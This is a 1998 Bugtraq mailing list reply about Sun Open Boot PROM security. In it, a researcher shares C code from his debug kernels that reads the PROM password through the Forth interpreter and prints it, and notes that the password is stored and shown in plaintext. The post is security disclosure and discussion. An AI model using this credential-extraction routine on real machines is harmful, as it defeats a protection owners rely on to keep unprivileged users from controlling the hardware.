[7260] in bugtraq
Re: Regarding Mudge's OBP/FORTH root hack (PHRACK53)
daemon@ATHENA.MIT.EDU (Leendert van Doorn)
Tue Jul 14 14:52:27 1998
Date: Mon, 13 Jul 1998 16:30:07 -0400
Reply-To: leendert@WATSON.IBM.COM
From: Leendert van Doorn <leendert@WATSON.IBM.COM>
X-To: James Bonfield <jkb@MRC-LMB.CAM.AC.UK>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: Your message of "Mon, 13 Jul 1998 09:22:11 BST."
             <9807130822.AA30702@arran>

# Jericho Nunn wrote:
#
# > Aside from the fact that it left me quite flabbergasted for quite
# >some time, mudge's OBP memory manipulation for acquiring root privileges
# >poses a serious risk for environments where SUN workstation consoles are
# >easily accessible to unprivileged individuals, such as university labs.
#
# This has been known for a long time. Indeed some 7 years ago whilst I
# was at university, and in my more "cat and mouse" gaming moods, I used
# this trick and a prom password was promptly added.

Given that we are on the subject of open boot prom passwords. Because of
a disagreement with the person that managed the pool of Sparc stations
we ran Amoeba on (he didn't want to give me the prom password but I was
allowed to boot my own kernels), my own kernels contained the following
piece of code:

#ifndef NDEBUG
/*
 * Print the prom password so I know what it is when debugging a kernel
 */
void
print_password(void)
{
    char cmd[OBP_CMDLEN], pwd[8];
    int i, pwdlen = 0;

    preprom();
    if (obp->op_interpret) {
        /*
         * Forth: security-password leaves (addr len) on the stack; the
         * rest stores len at &pwdlen and moves len bytes from addr to pwd.
         */
        (void) sprintf(cmd,
            "security-password %x swap dup %x ! move", pwd, &pwdlen);
        obp->op_interpret(cmd);
        if (pwdlen > 0) {
            printf("OBP Password = '");
            for (i = 0; i < pwdlen; i++)
                printf("%c", pwd[i]);
            printf("'\n");
        }
    }
    postprom();
}
#endif /* NDEBUG */

Yes, the prom password is unencrypted. "security-password dump" will
show the plaintext version.

        Leendert

--
Leendert van Doorn <leendert@watson.ibm.com>
IBM T.J. Watson Research Center (914) 784-7831
30 Saw Mill River Road, Hawthorne, NY 10532